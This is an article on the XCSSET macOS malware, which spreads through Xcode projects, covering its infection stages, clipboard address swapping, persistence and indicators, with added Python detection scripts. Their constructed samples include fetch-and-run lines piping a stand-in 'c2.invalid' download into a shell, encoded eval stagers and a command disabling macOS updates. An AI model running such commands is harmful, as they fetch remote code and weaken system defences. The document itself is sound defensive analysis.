
Microsoft Threat Intelligence has identified a new variant of the XCSSET macOS malware in limited attacks, marking a significant evolution of a threat first documented in 2020.[1] This sophisticated malware, which uniquely targets software developers by infecting Xcode projects, has incorporated several new capabilities, including clipboard hijacking for cryptocurrency theft and a more robust persistence mechanism using a system-level LaunchDaemon.[2] The discovery, detailed in reports from March and September 2025, demonstrates the malware’s active development and its increasing risk to the software supply chain.
The continued refinement of XCSSET throughout 2025 represents the first major update to the malware since 2022.[7] Its primary infection vector remains the compromise of Xcode projects, which can lead to a wormable spread as developers build and share infected projects. The latest variants show enhanced obfuscation techniques, expanded data theft modules targeting the Firefox browser, and more sophisticated methods to maintain a foothold on compromised systems. This progression underscores a focused effort by threat actors to exploit the trust within developer ecosystems.
Infection Chain and Core Payload
The infection process begins when a developer builds a compromised Xcode project. The initial stage involves a heavily obfuscated shell payload, often decoded through multiple iterations of commands like `xxd` or `base64`. This payload typically executes a `curl` command to fetch the next stage from a Command-and-Control (C2) server. The second stage collects basic system information, such as the macOS version, and sends it back to the C2 to download a subsequent payload. This script performs reconnaissance, checks security software versions, and terminates processes like Terminal and Finder to avoid detection.[1]
The third stage downloads a core AppleScript payload, often named `/tmp/b` or `looz`, which acts as the malware’s orchestrator. This module collects extensive system data, including System Integrity Protection (SIP) status, firewall settings, and installed browser information, and exfiltrates it to the C2 server. Its primary function is to call a `boot()` method that downloads and executes various sub-modules based on commands received from the attacker’s server, enabling a modular and updatable malicious framework.[1]
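Because the first stage lives in a Run Script build phase of the project file, the place to look on a developer machine is `project.pbxproj`. The scanner below is an added defensive example, not code from the Microsoft reports: it pulls every `PBXShellScriptBuildPhase`, decodes the escaped script string, and flags the chained-decoder-into-`curl`/shell shape described above. The indicator set is an assumption derived from that description, and `SAMPLE_PBXPROJ` is a constructed project fragment (the hex is a placeholder, and `c2.invalid` is a reserved, non-resolving name), not a real sample.

```python
"""Scan an Xcode project.pbxproj for Run Script build phases that look like the
XCSSET stager: layered xxd/base64 decoding feeding curl, eval or a shell.

Added defensive example; not code from the Microsoft reports. The indicator
set is an assumption derived from the infection chain described in the text,
and SAMPLE_PBXPROJ is a constructed project fragment, not a real sample."""
import re
import sys
from pathlib import Path
from typing import Dict, List

# One PBXShellScriptBuildPhase object: from its isa line to the object's closing "};".
PHASE_RE = re.compile(r"isa = PBXShellScriptBuildPhase;(?P<body>.*?)\n\s*\};", re.DOTALL)
# The script is stored as a C-style escaped string.
SCRIPT_RE = re.compile(r'shellScript = "(?P<script>(?:[^"\\]|\\.)*)";', re.DOTALL)
NAME_RE = re.compile(r'name = "?(?P<name>[^";]+)"?;')

# Traits of the first stage described in the text (assumed heuristics, not a published signature).
INDICATORS = {
    "hex_decode": re.compile(r"\bxxd\b[^|;\n]*-r\b"),
    "base64_decode": re.compile(r"\bbase64\b[^|;\n]*(?:-d|-D|--decode)\b"),
    "remote_fetch": re.compile(r"\bcurl\b|\bwget\b"),
    "eval_or_pipe_to_shell": re.compile(r"\beval\b|\|\s*(?:sh|bash|zsh)\b"),
    "osascript": re.compile(r"\bosascript\b"),
}
_ESCAPES = {"n": "\n", "t": "\t"}


def unescape_pbx(value: str) -> str:
    """Undo pbxproj string escaping (backslash-n, backslash-t, backslash-quote, double backslash)."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), value, flags=re.DOTALL)


def extract_shell_phases(pbxproj: str) -> List[Dict[str, str]]:
    """Return the name and decoded script of every PBXShellScriptBuildPhase."""
    phases = []
    for phase in PHASE_RE.finditer(pbxproj):
        body = phase.group("body")
        script = SCRIPT_RE.search(body)
        if not script:
            continue
        name = NAME_RE.search(body)
        phases.append({"name": name.group("name") if name else "(unnamed)",
                       "script": unescape_pbx(script.group("script"))})
    return phases


def assess_script(script: str) -> Dict[str, object]:
    """Flag chained decoders, or a decoder whose output feeds the network, eval or a shell."""
    hits = [key for key, rx in INDICATORS.items() if rx.search(script)]
    decode_stages = (len(INDICATORS["hex_decode"].findall(script))
                     + len(INDICATORS["base64_decode"].findall(script)))
    suspicious = decode_stages >= 2 or (
        decode_stages >= 1 and ("remote_fetch" in hits or "eval_or_pipe_to_shell" in hits))
    return {"indicators": hits, "decode_stages": decode_stages, "suspicious": suspicious}


def scan_pbxproj(pbxproj: str) -> List[Dict[str, object]]:
    return [{"name": p["name"], **assess_script(p["script"])} for p in extract_shell_phases(pbxproj)]


# Constructed fragment: one ordinary lint phase and one phase shaped like the stager.
SAMPLE_PBXPROJ = r'''
    A1B2 /* ShellScript */ = {
        isa = PBXShellScriptBuildPhase;
        buildActionMask = 2147483647;
        files = (
        );
        name = "Lint";
        runOnlyForDeploymentPostprocessing = 0;
        shellPath = /bin/sh;
        shellScript = "if which swiftlint >/dev/null; then\n  swiftlint\nfi\n";
    };
    C3D4 /* ShellScript */ = {
        isa = PBXShellScriptBuildPhase;
        buildActionMask = 2147483647;
        files = (
        );
        runOnlyForDeploymentPostprocessing = 0;
        shellPath = /bin/sh;
        shellScript = "eval \"$(echo 4845582d504c414345484f4c444552 | xxd -r -p | base64 --decode)\" && curl -s http://c2.invalid/stage2 | sh\n";
    };
'''

if __name__ == "__main__":
    # Usage: python3 scan_pbxproj.py path/to/Project.xcodeproj/project.pbxproj
    text = Path(sys.argv[1]).read_text() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for result in scan_pbxproj(text):
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} {result['name']}: stages={result['decode_stages']} {result['indicators']}")
```

Run it over every `project.pbxproj` in a freshly cloned repository before the first build; an unnamed phase whose script is mostly a hex or base64 blob is worth reading in full even if the heuristics stay quiet.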
Enhanced Data Theft and Clipboard Hijacking
A key addition in the September 2025 variant is the enhanced `vexyeqj` module, which upgrades the previous info-stealer with clipboard monitoring capabilities. This sub-module, named `bnk`, downloads an encrypted configuration file from the C2 server containing a list of targeted cryptocurrencies like Bitcoin and Ethereum. The configuration includes regular expression patterns to identify specific wallet addresses and a list of attacker-controlled addresses for substitution.[2]
When a user copies a cryptocurrency address to the clipboard, the malware checks it against the configuration. If the address matches a targeted currency pattern but is not one of the attacker’s addresses, the malware silently replaces the clipboard content with an address from the attacker’s list. This technique can redirect payments intended for a legitimate recipient to the threat actor. The `bnk` payload is delivered as a run-only compiled AppleScript, complicating static analysis, and uses AES encryption for communications with the C2 server.[2]
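The substitution has a recognisable signature from the victim's side: the clipboard still holds a syntactically valid address of the same currency, just not the one that was copied. The check below is an added defensive example (it is not the `bnk` module's logic) that a user or a wallet front-end could run before pasting. The address patterns are approximate public address formats, an assumption that is good enough to classify an address but does not validate checksums; every address in the block is a constructed test value, and `pbpaste` is the standard macOS pasteboard command.

```python
"""Check whether a clipboard swap of the kind described above has happened:
the clipboard still holds a wallet address of the same currency, but not the
one the user copied.

Added defensive example; this is not XCSSET's bnk logic. The address patterns
are approximate public address formats (an assumption, good enough to classify
but not to validate checksums), and every address below is a constructed test
value."""
import re
import subprocess
import sys
from typing import Dict, Optional

ADDRESS_PATTERNS = {
    # Base58 legacy/P2SH: starts with 1 or 3, no 0/O/I/l.
    "bitcoin_legacy_or_p2sh": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    # Bech32: bc1 prefix, lowercase charset without 1/b/i/o.
    "bitcoin_bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{11,71}$"),
    "ethereum": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}

# Constructed addresses for demonstration only; none of them is a real wallet.
SAMPLES = {
    "eth_copied": "0x" + "ab" * 20,
    "eth_swapped": "0x" + "cd" * 20,
    "btc_legacy": "1ConstructedTestAddrForDemoXYZabc",
    "btc_bech32": "bc1qexampleaddr" + "0" * 26,
}


def classify(text: str) -> Optional[str]:
    """Name the currency whose address format the text matches, or None."""
    text = text.strip()
    for name, rx in ADDRESS_PATTERNS.items():
        if rx.match(text):
            return name
    return None


def check_clipboard(copied: str, clipboard: str) -> Dict[str, object]:
    """Compare the address the user copied with what the clipboard now holds."""
    copied, clipboard = copied.strip(), clipboard.strip()
    kind = classify(copied)
    if kind is None:
        verdict = "not_an_address"
    elif copied == clipboard:
        verdict = "unchanged"
    elif classify(clipboard) == kind:
        verdict = "replaced_same_currency"  # the substitution pattern the text describes
    else:
        verdict = "replaced_other"
    return {"currency": kind, "verdict": verdict, "tampered": verdict.startswith("replaced")}


def current_clipboard() -> str:
    """Read the macOS pasteboard with pbpaste (only meaningful on a Mac)."""
    return subprocess.run(["pbpaste"], capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    # Usage: python3 clipcheck.py <the address you just copied>
    expected = sys.argv[1] if len(sys.argv) > 1 else SAMPLES["eth_copied"]
    print(check_clipboard(expected, current_clipboard()))
```

A `replaced_same_currency` verdict is the one to act on: a random clipboard overwrite by another application would rarely produce a well-formed address of exactly the currency that was copied.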
New Persistence and Evasion Techniques
The malware’s persistence mechanisms have been expanded beyond the established `zshrc` and Dock methods. The September variant introduces a `LaunchDaemon` persistence module (`xmyyeqjx`). This module uses AppleScript’s `with administrator privileges` clause to gain elevated rights and create a system-level daemon plist file. The daemon is configured to execute a payload script that ensures the malware’s main `.zshrc` persistence remains active and even attempts to disable macOS security updates. The plist often uses a `com.google.` prefix to appear legitimate.[2]
Other persistence methods detailed in the March 2025 report include a Git-based technique that modifies or creates `pre-commit` hooks in `.git` directories, ensuring execution every time a developer makes a commit. The Dock method involves using a tool called `dockutil` to replace the legitimate Launchpad dock entry with a malicious application that runs the payload before launching the real application. These multi-layered persistence strategies increase the malware’s resilience on an infected system.[1]
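Two of these persistence points, the system LaunchDaemon and the git `pre-commit` hook, are easy to audit from a script. The block below is an added defensive example, not code from the Microsoft reports: it parses a LaunchDaemon plist with the standard `plistlib`, looks at the script the daemon launches, and checks hook files for the stager traits. The plists, script and hooks are constructed, and the heuristics (a program in a user-writable location, a `com.google.` label whose program is outside Google's install directories, `.zshrc` or `softwareupdate` references in the launched script) are my assumptions rather than a published signature.

```python
"""Audit two XCSSET persistence points described above: a system LaunchDaemon
plist (with the script it launches) and git pre-commit hooks.

Added defensive example, not code from the Microsoft reports. The plists,
script and hooks below are constructed, and the heuristics are assumptions
rather than a published signature."""
import os
import plistlib
import re
from pathlib import Path
from typing import Dict, List

USER_WRITABLE = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/", "~/")
GOOGLE_INSTALL_PATHS = ("/Applications/Google", "/Library/Google")
SCRIPT_INDICATORS = {
    "zshrc_reference": re.compile(r"\.zshrc"),
    "update_tampering": re.compile(r"\bsoftwareupdate\b"),
    "remote_fetch": re.compile(r"\bcurl\b|\bwget\b"),
    "decoder": re.compile(r"\bbase64\b[^|\n]*(?:-d|-D|--decode)\b|\bxxd\b[^|\n]*-r\b"),
    "osascript": re.compile(r"\bosascript\b"),
}
HOOK_KEYS = ("remote_fetch", "decoder", "osascript")


def audit_launch_daemon(plist_bytes: bytes, launched_script: str = "") -> Dict[str, object]:
    """Flag a daemon whose program or label looks wrong, or whose script touches the shell profile or updates."""
    d = plistlib.loads(plist_bytes)
    label = d.get("Label", "")
    args = list(d.get("ProgramArguments", [])) or ([d["Program"]] if "Program" in d else [])
    findings = []
    for a in args:
        if a.startswith(USER_WRITABLE):
            findings.append(f"program in user-writable path: {a}")
    if label.startswith("com.google.") and not any(a.startswith(GOOGLE_INSTALL_PATHS) for a in args):
        findings.append(f"vendor-looking label with non-vendor program: {label}")
    for key, rx in SCRIPT_INDICATORS.items():
        if rx.search(launched_script):
            findings.append(f"launched script: {key}")
    notes = ["RunAtLoad+KeepAlive: restarts automatically"] if d.get("RunAtLoad") and d.get("KeepAlive") else []
    return {"label": label, "program_arguments": args, "findings": findings,
            "notes": notes, "suspicious": bool(findings)}


def audit_pre_commit_hook(hook_text: str) -> Dict[str, object]:
    """A lint hook is normal; a hook that fetches, decodes or runs AppleScript is not."""
    hits = [k for k in HOOK_KEYS if SCRIPT_INDICATORS[k].search(hook_text)]
    return {"indicators": hits, "suspicious": bool(hits)}


def find_pre_commit_hooks(root: str) -> List[Path]:
    """Walk a checkout tree and return every .git/hooks/pre-commit (the .sample files are inert)."""
    hooks = []
    for dirpath, _, files in os.walk(root):
        if (os.path.basename(dirpath) == "hooks"
                and os.path.basename(os.path.dirname(dirpath)) == ".git"
                and "pre-commit" in files):
            hooks.append(Path(dirpath) / "pre-commit")
    return hooks


# Constructed inputs: a daemon shaped like the one described, and an ordinary vendor daemon.
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.updater.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>/Users/dev/Library/Caches/.helper.sh</string>
  </array>
  <key>RunAtLoad</key><true/><key>KeepAlive</key><true/>
</dict></plist>"""
# Constructed stand-in for the launched script: keeps the ~/.zshrc_aliases file present, touches updates.
SUSPECT_SCRIPT = "#!/bin/sh\ntest -f ~/.zshrc_aliases || touch ~/.zshrc_aliases\nsoftwareupdate --schedule off\n"
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.example.updater</string>
  <key>ProgramArguments</key><array><string>/Library/Google/Example/updater</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""
SUSPECT_HOOK = "#!/bin/sh\nswiftlint --quiet\ncurl -s http://c2.invalid/p | base64 -d | sh\n"
BENIGN_HOOK = "#!/bin/sh\nswiftlint --quiet\n"


if __name__ == "__main__":
    for plist_path in sorted(Path("/Library/LaunchDaemons").glob("*.plist")):
        report = audit_launch_daemon(plist_path.read_bytes())
        if report["suspicious"]:
            print(plist_path, report["findings"])
    for hook in find_pre_commit_hooks(os.path.expanduser("~")):
        report = audit_pre_commit_hook(hook.read_text(errors="replace"))
        if report["suspicious"]:
            print(hook, report["indicators"])
```

On a real machine the `__main__` section reads `/Library/LaunchDaemons` and walks the home directory for hooks; pass the launched script's contents as the second argument of `audit_launch_daemon` to get the script-level findings as well.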
Expanded Targeting and Mitigation Strategies
The malware’s data theft capabilities have been broadened to include the Firefox browser through a new module named `iewmilh_cdyd`. This module downloads a modified version of the open-source `HackBrowserData` tool, which is executed to decrypt and export sensitive data from Firefox, including saved passwords, browsing history, and cookies. The data is then archived and sent to the C2 server. This expansion beyond WebKit and Chromium-based browsers demonstrates the actors’ intent to maximize the theft of valuable information.[2]
To protect against XCSSET, developers should exercise vigilance when working with Xcode projects, especially those cloned from public repositories. Keeping macOS and Xcode updated to the latest versions is critical. Deploying endpoint detection and response solutions can provide specific detections for this activity. For high-value operations like cryptocurrency transactions, manually verifying pasted wallet addresses is recommended. Adhering to the principle of least privilege by avoiding daily use of an administrator account can also limit the malware’s impact.[7]
Indicators of Compromise and Attribution
The infrastructure associated with XCSSET has also evolved. The March 2025 variant used C2 domains like `bulknames[.]ru` and `gizmodoc[.]ru`, while the September variant has shifted to domains such as `cdntor[.]ru` and `applecdn[.]ru`. File paths associated with the malware include `~/Library/Caches/com.apple.finder/` for a fake Launchpad application and `~/.zshrc_aliases` for a persistence script. Example SHA-256 hashes include `d338dc9a75a14753f57399815b5d996a1c5e65aa4eb203222d8c85fb3d74b02f` for a fourth-stage payload.[1, 2]
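The indicators above are defanged (`[.]`), so they need refanging before they can be matched against DNS or proxy logs, and a naive substring match would also hit look-alike names. The block below is an added defensive example, not code from the Microsoft reports: it refangs the domains, matches them (and their subdomains, but not `notcdntor.ru`-style superstrings) against log lines, compares SHA-256 digests against the listed hash, and checks whether the listed paths exist for the current user. The indicator values are the ones quoted in the text; `SAMPLE_LOG` is constructed.

```python
"""Match the XCSSET indicators quoted above against DNS/proxy log lines, file
hashes and local paths.

Added defensive example, not code from the Microsoft reports. The indicator
values are the ones quoted in the text; SAMPLE_LOG is constructed."""
import hashlib
import re
import sys
from pathlib import Path
from typing import Dict, List

DEFANGED_DOMAINS = ["bulknames[.]ru", "gizmodoc[.]ru", "cdntor[.]ru", "applecdn[.]ru"]
FILE_PATHS = ["~/Library/Caches/com.apple.finder/", "~/.zshrc_aliases"]
SHA256_HASHES = {"d338dc9a75a14753f57399815b5d996a1c5e65aa4eb203222d8c85fb3d74b02f"}


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into a matchable one."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def build_domain_pattern(domains: List[str]) -> "re.Pattern":
    """Match each domain or any subdomain of it as a whole label sequence."""
    alternatives = "|".join(re.escape(refang(d)) for d in domains)
    # No word char or dot before; after the match, neither a word char nor a dot followed by one.
    return re.compile(r"(?<![\w.-])(?:[\w-]+\.)*(" + alternatives + r")(?![\w-]|\.[\w-])",
                      re.IGNORECASE)


DOMAIN_PATTERN = build_domain_pattern(DEFANGED_DOMAINS)


def match_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return the line number, matched indicator domain and text of every hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = DOMAIN_PATTERN.search(line)
        if m:
            hits.append({"line": number, "domain": m.group(1).lower(), "text": line.strip()})
    return hits


def hash_matches(data: bytes) -> bool:
    return hashlib.sha256(data).hexdigest() in SHA256_HASHES


def file_hash_matches(path: str) -> bool:
    return hash_matches(Path(path).read_bytes())


def check_paths(paths: List[str] = FILE_PATHS) -> Dict[str, bool]:
    """Report which of the indicator paths exist for the current user."""
    return {p: Path(p).expanduser().exists() for p in paths}


# Constructed log lines: one subdomain hit, one proxy hit, one look-alike that must not match.
SAMPLE_LOG = [
    "2025-09-26T10:01:02Z dns query A github.com from 10.0.0.5",
    "2025-09-26T10:01:07Z dns query A cdn.cdntor.ru from 10.0.0.5",
    "2025-09-26T10:01:09Z proxy CONNECT applecdn.ru:443 user dev",
    "2025-09-26T10:01:11Z dns query A notcdntor.ru from 10.0.0.7",
]


if __name__ == "__main__":
    # Usage: python3 ioc_match.py < dns.log   (falls back to SAMPLE_LOG on a terminal)
    lines = SAMPLE_LOG if sys.stdin.isatty() else sys.stdin.read().splitlines()
    for hit in match_log_lines(lines):
        print(f"line {hit['line']}: {hit['domain']} in '{hit['text']}'")
    for path, present in check_paths().items():
        print(f"{'PRESENT' if present else 'absent '} {path}")
```

The presence check is only a starting point: `~/Library/Caches/com.apple.finder/` existing is a prompt to inspect what is inside it, since the report ties that directory to a fake Launchpad application rather than to a file with a fixed name.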
The malware employs a wide range of techniques mapped to the MITRE ATT&CK framework, including Supply Chain Compromise (T1195.001), Execution via AppleScript (T1059.002), and Persistence via Plist File Modification (T1556.003). The continuous development of XCSSET, with its focus on developers and supply chain attacks, highlights a persistent and dangerous threat to the macOS ecosystem that requires ongoing vigilance and layered defensive measures.[1, 2]
References
1. Microsoft Security Blog. (2025, March 11). New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects.
2. Microsoft Security Blog. (2025, September 25). XCSSET evolves again: Analyzing the latest updates to XCSSET’s inventory.
3. Microsoft Threat Intelligence [@MsftSecIntel]. (2025, September 25). Announcement of new XCSSET variant [Post]. X.
4. Broadcom Support. (2025, March 18). New XCSSET macOS malware variant discovered.
5. The Stack. (2025, February 17). Upgraded macOS malware is targeting Apple developers.
6. Microsoft Security Intelligence. (2022, updated 2025). Trojan:MacOS/XCSSET.A threat description.
7. Montalbano, E. (2025, February 18). Microsoft: New Variant of macOS Threat XCSSET Spotted in the Wild. Dark Reading.
8. Trend Micro. (2020, August). XCSSET Mac Malware – Infects Xcode Projects, Uses 0-Days.
9. Nelson, N. (2025, June 19). Iran-Israel War Triggers a Maelstrom in Cyberspace. Dark Reading.
10. InfoSecurity Magazine. (2025, February 17). Microsoft Detects New XCSSET MacOS Malware Variant.